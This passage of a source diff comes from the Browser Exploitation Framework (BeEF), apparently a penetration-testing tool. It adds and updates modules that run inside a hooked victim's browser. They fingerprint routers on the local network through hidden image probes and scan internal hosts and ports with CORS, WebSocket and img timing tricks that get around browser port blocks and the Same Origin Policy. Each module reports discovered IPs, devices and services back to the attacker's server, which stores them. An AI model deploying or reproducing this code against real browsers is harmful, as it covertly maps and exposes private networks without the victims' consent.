var guessesLen = guesses.length;
for(var f=0;f<guessesLen;f++) {
document.body.removeChild(document.getElementById('connection'+f));
}
}
lanScanner.fingerPrint = function(address) {
var make,fingerprint;
for(var i=0;i<ips.length;i++) {
if(ips[i].ip == address) {
make = ips[i].make;
for(var k=0;k<devices.length;k++) {
if(devices[k].make == make) {
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.id = 'probe'+this.probes;
img.name = 'probe'+this.probes;
img.onerror = function() { document.body.removeChild(this); }
img.onload = function() { lanScanner.handleProbe(this); }
img.init = 1;
img.model = devices[k].model;
img.make = make;
img.host = address;
img.src = 'http://' + address + devices[k].graphic;
this.probes++;
document.body.appendChild(img);
}
}
}
}
}
var guessesLen = guesses.length;
for(var f=0;f<guessesLen;f++) {
var iframe = beef.dom.createInvisibleIframe();
iframe.name = "connection"+f;
iframe.id = "connection"+f;
iframe.onload = function() {
lanScanner.handleConnection(this);
}
}
beef.debug("[JS LAN Scanner] Starting scan ("+guessesLen+" IPs)");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Starting scan ("+guessesLen+" IPs)");
lanScanner.runScan();
//lanScanner.destroyConnections();
});

18
modules/network/jslanscanner/config.yaml Normal file
View File

@@ -0,0 +1,18 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Ported to BeEF from JsLanScanner: https://code.google.com/p/jslanscanner/source/browse/trunk/lan_scan/js/lan_scan.js
#
beef:
module:
fingerprint_routers:
enable: true
category: "Network"
name: "Fingerprint Routers"
description: "This module attempts to discover network routers on the local network of the hooked browser. It scans for web servers on IP addresses commonly used by routers. It uses a signature based approach - based on default image paths for known network devices - to determine if the web server is a router web interface.<br/><br/>Ported to BeEF from <a href='http://code.google.com/p/jslanscanner/' target='_blank'>JsLanScanner</a>.<br/><br/>Note: The user may see authentication popups in the event any of the target IP addresses are using HTTP authentication."
authors: ["Gareth Heyes"]
target:
user_notify: ["FF", "S"]
not_working: ["C", "IE"]

47
modules/network/jslanscanner/module.rb Normal file
View File

@@ -0,0 +1,47 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Fingerprint_routers < BeEF::Core::Command
def self.options
return [
]
end
def post_execute
content = {}
content['results'] = @datastore['results'] if not @datastore['results'].nil?
save content
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&service=(.+)/
proto = $1
ip = $2
port = $3
service = $4
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if !ip.nil?
print_debug("Hooked browser found network service " + service + " [proto: #{proto}, ip: #{ip}, port: #{port}]")
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => service, :cid => cid)
r.save
end
elsif @datastore['results'] =~ /^ip=(.+)&device=(.+)/
ip = $1
device = $2
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if !ip.nil?
print_debug("Hooked browser found network device " + device + " [ip: #{ip}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => device, :cid => cid)
r.save
end
end
end
end
end

16
modules/network/ping_sweep/module.rb
View File

@@ -26,5 +26,21 @@ class Ping_sweep < BeEF::Core::Command
content['fail'] = 'No active hosts have been discovered.'
end
save content
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
# save the network host
if @datastore['results'] =~ /host=([\d\.]+) is alive/
ip = $1
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
r.save
end
end
end
end

26
modules/network/port_scanner/command.js
View File

@@ -9,9 +9,9 @@ beef.execute(function() {
var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ];
var default_ports = [ 1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088 ];
var default_ports = [ 1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088 ];
var default_services = { '1':'tcpmux','5':'rje','7':'echo','9':'msn','15':'netstat','20':'ftp-data','21':'ftp','22':'ssh','23':'telnet','25':'smtp','26':'rsftp','29':'msgicp','33':'dsp','37':'time','42':'nameserver','43':'whois','53':'dns','67':'dhcps','68':'dhcpc','69':'tftp','70':'gopher','76':'deos','79':'finger','80':'http','88':'kerberos-sec','90':'dnsix','98':'linuxconf','101':'hostname','106':'pop3pw','109':'pop2','110':'pop3','111':'rpcbind','113':'auth','114':'audionews','115':'sftp','118':'sqlserv','119':'nntp','123':'ntp','129':'pwdgen','132':'cisco-sys','133':'statsrv','135':'msrpc','136':'profile','137':'netbios-ns','138':'netbios-dgm','139':'netbios-ssn','143':'imap','144':'news','156':'sqlserv','158':'pcmail-srv','161':'snmp','162':'snmptrap','168':'rsvd','174':'mailq','177':'xdmcp','194':'irc','197':'dls','209':'tam','213':'ipx','217':'dbase','219':'uarps','220':'imap3','223':'cdc','264':'bgmp','315':'dpsi','316':'decauth','346':'zserv','353':'ndsauth','389':'ldap','413':'smsp','414':'infoseek','415':'bnet','416':'silverplatter','440':'sgcp','443':'https','444':'snpp','445':'microsoft-ds','453':'creativeserver','454':'contentserver','456':'macon','457':'scohelp','458':'appleqtc','462':'datasurfsrvsec','464':'kpasswd5','465':'smtps','466':'digital-vrc','480':'loadsrv','486':'sstats','497':'retrospect','500':'isakmp','501':'stmf','516':'videotex','518':'ntalk','522':'ulp','523':'ibm-db2','524':'ncp','525':'timed','526':'tempo','533':'netwall','535':'iiop','538':'gdomap','540':'uucp','541':'uucp-rlogin','542':'commerce','543':'klogin','544':'kshell','545':'ekshell','546':'dhcpconf','547':'dhcpserv','556':'remotefs','557':'openvms-sysipc','560':'rmonitor','561':'monitor','563':'snews','564':'9pfs','625':'apple-xsrvr-admin','626':'apple-imap-admin','636':'ldapssl','637':'lanserver','660':'mac-srvr-admin','664':'secure-aux-bus','666':'doom','683':'corba-iiop','740':'netcp','741':'netgw','742':'netrcs','744':'flexlm','747':'fujitsu-dev','748':'ris-cm','749':'kerberos-adm','750':'kerberos','751':'kerberos_master','752':'qrh','753':'rrh','754':'krb_prop','758':'nlogin','760':'krbupdate','761':'kpasswd','762':'quotad','763':'cycleserv','764':'omserv','765':'webster','767':'phonebook','771':'rtip','773':'submit','774':'rpasswd','775':'entomb','776':'wpages','780':'wpgs','781':'hp-collector','782':'hp-managed-node','783':'spamassassin','786':'concert','787':'qsc','799':'controlit','800':'mdbs_daemon','801':'device','808':'ccproxy-http','871':'supfilesrv','873':'rsync','888':'accessbuilder','898':'sun-manageconsole','901':'samba-swat','953':'rndc','989':'ftps-data','990':'ftps','992':'telnets','993':'imaps','994':'ircs','995':'pop3s','996':'xtreelic','997':'maitrd','998':'busboy','999':'garcon','1000':'cadlock','1002':'windows-icfw','1008':'ufsd','1023':'netvenuechat','1024':'kdm','1080':'socks','8080':'tomcat','8443':'tomcat','8050':'coldfusion','3306':'mysql','5432':'postgres','1521 ':'oracle','1433':'mssql','3389':'msrdp','10088':'zendserver' };
var default_services = { '1':'tcpmux','5':'rje','7':'echo','9':'msn','15':'netstat','20':'ftp-data','21':'ftp','22':'ssh','23':'telnet','25':'smtp','26':'rsftp','29':'msgicp','33':'dsp','37':'time','42':'nameserver','43':'whois','53':'dns','67':'dhcps','68':'dhcpc','69':'tftp','70':'gopher','76':'deos','79':'finger','80':'http','88':'kerberos-sec','90':'dnsix','98':'linuxconf','101':'hostname','106':'pop3pw','109':'pop2','110':'pop3','111':'rpcbind','113':'auth','114':'audionews','115':'sftp','118':'sqlserv','119':'nntp','123':'ntp','129':'pwdgen','132':'cisco-sys','133':'statsrv','135':'msrpc','136':'profile','137':'netbios-ns','138':'netbios-dgm','139':'netbios-ssn','143':'imap','144':'news','156':'sqlserv','158':'pcmail-srv','161':'snmp','162':'snmptrap','168':'rsvd','174':'mailq','177':'xdmcp','194':'irc','197':'dls','209':'tam','213':'ipx','217':'dbase','219':'uarps','220':'imap3','223':'cdc','264':'bgmp','315':'dpsi','316':'decauth','346':'zserv','353':'ndsauth','389':'ldap','413':'smsp','414':'infoseek','415':'bnet','416':'silverplatter','440':'sgcp','443':'https','444':'snpp','445':'microsoft-ds','453':'creativeserver','454':'contentserver','456':'macon','457':'scohelp','458':'appleqtc','462':'datasurfsrvsec','464':'kpasswd5','465':'smtps','466':'digital-vrc','480':'loadsrv','486':'sstats','497':'retrospect','500':'isakmp','501':'stmf','516':'videotex','518':'ntalk','522':'ulp','523':'ibm-db2','524':'ncp','525':'timed','526':'tempo','533':'netwall','535':'iiop','538':'gdomap','540':'uucp','541':'uucp-rlogin','542':'commerce','543':'klogin','544':'kshell','545':'ekshell','546':'dhcpconf','547':'dhcpserv','556':'remotefs','557':'openvms-sysipc','560':'rmonitor','561':'monitor','563':'snews','564':'9pfs','625':'apple-xsrvr-admin','626':'apple-imap-admin','631':'ipp','636':'ldapssl','637':'lanserver','660':'mac-srvr-admin','664':'secure-aux-bus','666':'doom','683':'corba-iiop','740':'netcp','741':'netgw','742':'netrcs','744':'flexlm','747':'fujitsu-dev','748':'ris-cm','749':'kerberos-adm','750':'kerberos','751':'kerberos_master','752':'qrh','753':'rrh','754':'krb_prop','758':'nlogin','760':'krbupdate','761':'kpasswd','762':'quotad','763':'cycleserv','764':'omserv','765':'webster','767':'phonebook','771':'rtip','773':'submit','774':'rpasswd','775':'entomb','776':'wpages','780':'wpgs','781':'hp-collector','782':'hp-managed-node','783':'spamassassin','786':'concert','787':'qsc','799':'controlit','800':'mdbs_daemon','801':'device','808':'ccproxy-http','871':'supfilesrv','873':'rsync','888':'accessbuilder','898':'sun-manageconsole','901':'samba-swat','953':'rndc','989':'ftps-data','990':'ftps','992':'telnets','993':'imaps','994':'ircs','995':'pop3s','996':'xtreelic','997':'maitrd','998':'busboy','999':'garcon','1000':'cadlock','1002':'windows-icfw','1008':'ufsd','1023':'netvenuechat','1024':'kdm','1080':'socks','1434':'ms-sql-m','4489':'radmin','6000':'x11','6446':'mysql-proxy','8080':'tomcat','8443':'tomcat','8050':'coldfusion','3306':'mysql','5432':'postgres','1521 ':'oracle','1433':'mssql','3389':'msrdp','10000':'webmin','10088':'zendserver','11371':'hkp' };
var host = '<%= @ipHost %>';
// TODO: Adjust times for each browser
@@ -106,7 +106,7 @@ beef.execute(function() {
{
process_port_cors = true;
port_status_cors = 4; // blocked
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is BLOCKED');}
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is BLOCKED');}
return;
}
@@ -145,7 +145,7 @@ beef.execute(function() {
if (interval < closetimeout)
{
port_status_cors = 1; // closed
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is CLOSED');}
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is CLOSED');}
} else
{
port_status_cors = 2; // open
@@ -154,7 +154,7 @@ beef.execute(function() {
{
known_service = "(" + default_services[port_] + ")";
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is OPEN ' + known_service);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is OPEN ' + known_service);
}
}
@@ -163,7 +163,7 @@ beef.execute(function() {
clearInterval(intID_cors);
process_port_cors = true;
port_status_cors = 3; // timeout
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is TIMEOUT');}
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is TIMEOUT');}
}
return;
}
@@ -176,7 +176,7 @@ beef.execute(function() {
{
process_port_ws = true;
port_status_ws = 4; // blocked
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is BLOCKED');}
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is BLOCKED');}
return;
}
@@ -222,7 +222,7 @@ beef.execute(function() {
if (interval < closetimeout)
{
port_status_ws = 1; // closed
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is CLOSED');}
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is CLOSED');}
} else
{
port_status_ws = 2; // open
@@ -231,7 +231,7 @@ beef.execute(function() {
{
known_service = "(" + default_services[port_] + ")";
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is OPEN ' + known_service);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is OPEN ' + known_service);
}
ws_scan.close();
}
@@ -241,7 +241,7 @@ beef.execute(function() {
clearInterval(intID_ws);
process_port_ws = true;
port_status_ws = 3; // timeout
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is TIMEOUT');}
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is TIMEOUT');}
ws_scan.close();
}
return;
@@ -264,7 +264,7 @@ beef.execute(function() {
if (process_port_http == false)
{
port_status_http = 1; // closed
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=HTTP: Port ' + port_ + ' is CLOSED');}
if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is CLOSED');}
clearInterval(intID_http);
}
process_port_http = true;
@@ -297,7 +297,7 @@ beef.execute(function() {
{
known_service = "(" + default_services[port_] + ")";
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=HTTP: Port ' + port_ + ' is OPEN ' + known_service);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is OPEN ' + known_service);
}
}
, 1);
@@ -311,7 +311,7 @@ beef.execute(function() {
return;
} else
{
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning: ' + ports_list);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning '+host+' [ports: ' + ports_list + ']');
}
count = 0;

4
modules/network/port_scanner/config.yaml
View File

@@ -9,8 +9,8 @@ beef:
enable: true
category: "Network"
name: "Port Scanner"
description: "Scan ports in a given hostname, using WebSockets, CORS and img tags. It uses the three methods to avoid blocked ports or Same Origin Policy."
description: "Scan ports in a given hostname, using WebSockets, CORS and img tags. It uses the three methods to avoid blocked ports or Same Origin Policy.<br/><br/>Note: The user may see authentication popups in the event any of the target ports are web servers using HTTP authentication."
authors: ["javier.marcos"]
target:
working: ["FF", "C"]
user_notify: ["FF", "C"]
not_working: ["S", "O", "IE"]

18
modules/network/port_scanner/module.rb
View File

@@ -29,5 +29,23 @@ class Port_scanner < BeEF::Core::Command
content['fail'] = 'No open ports have been found.'
end
save content
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
if @datastore['results'] =~ /^ip=([\d\.]+)&port=(CORS|WebSocket|HTTP): Port ([\d]+) is OPEN (.*)$/
ip = $1
port = $3
service = $4
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if !ip.nil?
print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]")
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => service, :cid => cid)
r.save
end
end
end
end
end